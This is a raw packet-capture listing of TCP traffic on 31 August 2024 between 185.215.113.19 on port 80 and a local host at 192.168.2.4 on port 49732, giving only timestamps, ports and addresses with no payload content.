Aug 31, 2024 22:41:57.401659012 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401669025 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401679993 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401690960 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401701927 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401712894 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401724100 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401734114 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401746035 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401757956 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401767969 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401778936 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401791096 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401802063 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401812077 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401823044 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401834011 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401844978 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401854992 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401865005 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401875973 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401885986 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401896954 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401907921 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401917934 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.401930094 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405678988 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405693054 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405704021 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405715942 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405725956 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405736923 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405746937 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405756950 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405769110 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405778885 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405790091 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405800104 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405811071 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405822992 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405833960 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405844927 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405855894 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405867100 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405877113 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405888081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405898094 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405908108 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405919075 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405929089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405940056 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405951977 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405966043 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405977011 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405987978 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.405998945 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406008959 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406021118 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406032085 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406042099 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406053066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406064034 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406074047 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406085014 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406095982 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406105995 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406116962 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406127930 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406138897 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406152010 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406164885 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406176090 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406187057 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406197071 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406208038 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406218052 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406229019 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406239033 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406250000 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406260967 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406270981 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406281948 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406292915 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406303883 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406313896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406325102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406335115 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406344891 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406356096 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406366110 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406377077 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406387091 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406398058 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406408072 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406419992 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406433105 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406445026 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406455040 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406465054 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406476021 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406486034 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406497002 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406507015 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406518936 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406531096 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406541109 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406553030 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406563997 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406574965 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406584978 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406594992 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.406605959 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410388947 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410403967 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410414934 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410425901 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410437107 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410446882 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410458088 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410470009 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410480976 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410490990 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410501957 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410512924 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410523891 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410533905 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410545111 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410554886 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410566092 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410577059 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410588026 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410598993 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410609007 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410619974 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410629988 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410640955 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410650969 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410662889 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410676003 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410686970 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410697937 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410702944 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410713911 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410723925 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410734892 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410747051 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410757065 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410767078 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410778046 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410789013 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410799026 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410809994 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410820961 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410830975 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410840988 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410851955 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410866022 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410880089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410891056 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410902023 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410912037 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410923004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410933971 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410943985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410953999 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410964966 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410975933 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410985947 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.410996914 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411007881 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411017895 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411029100 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411040068 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411050081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411061049 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411072016 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411082029 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411092997 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411103010 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411113977 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411123991 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411135912 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411148071 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411159039 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411170006 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411180973 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411191940 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411201954 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411212921 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411223888 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411233902 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411245108 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411254883 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411266088 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411276102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411287069 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411297083 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411308050 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.411319017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415138006 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415153980 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415164948 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415177107 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415186882 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415198088 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415209055 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415219069 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415229082 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415240049 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415251017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415261984 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415272951 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415282965 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415292978 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415303946 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415313959 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415324926 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415335894 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415345907 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415357113 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415366888 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415378094 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415390015 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415404081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415426970 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415440083 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415451050 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415462017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415472984 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415483952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415494919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415505886 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415517092 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415527105 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415538073 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415549040 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415560007 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415570021 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415580988 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415591955 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415602922 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415613890 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415623903 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415635109 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415646076 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415656090 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415666103 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415677071 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415687084 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415699005 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415712118 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415723085 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415734053 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415744066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415755033 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415765047 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415776014 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415786028 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415796995 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415807009 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415817976 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415828943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415838957 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415849924 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415859938 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415870905 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415880919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415891886 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415901899 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415913105 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415923119 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415934086 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415945053 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415955067 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415966988 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415978909 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.415990114 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.416001081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.416012049 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.416022062 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.416033030 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.416043043 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.416054010 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.416064024 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.416074991 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.419914961 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.419929028 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.419939995 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.419950962 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.419960976 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.419971943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.419982910 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.419992924 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420003891 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420013905 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420026064 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420037031 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420047998 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420058966 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420068979 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420078993 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420089960 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420100927 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420110941 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420121908 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420131922 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420142889 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420152903 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420164108 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420176029 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420188904 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420202017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420212984 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420223951 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420234919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420244932 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420255899 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420265913 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420277119 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420288086 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420298100 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420309067 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420320034 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420330048 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420341015 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420351982 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420362949 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420372963 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420383930 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420394897 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420406103 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.420521021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.420619011 CEST	49732	80	192.168.2.4	185.215.113.19
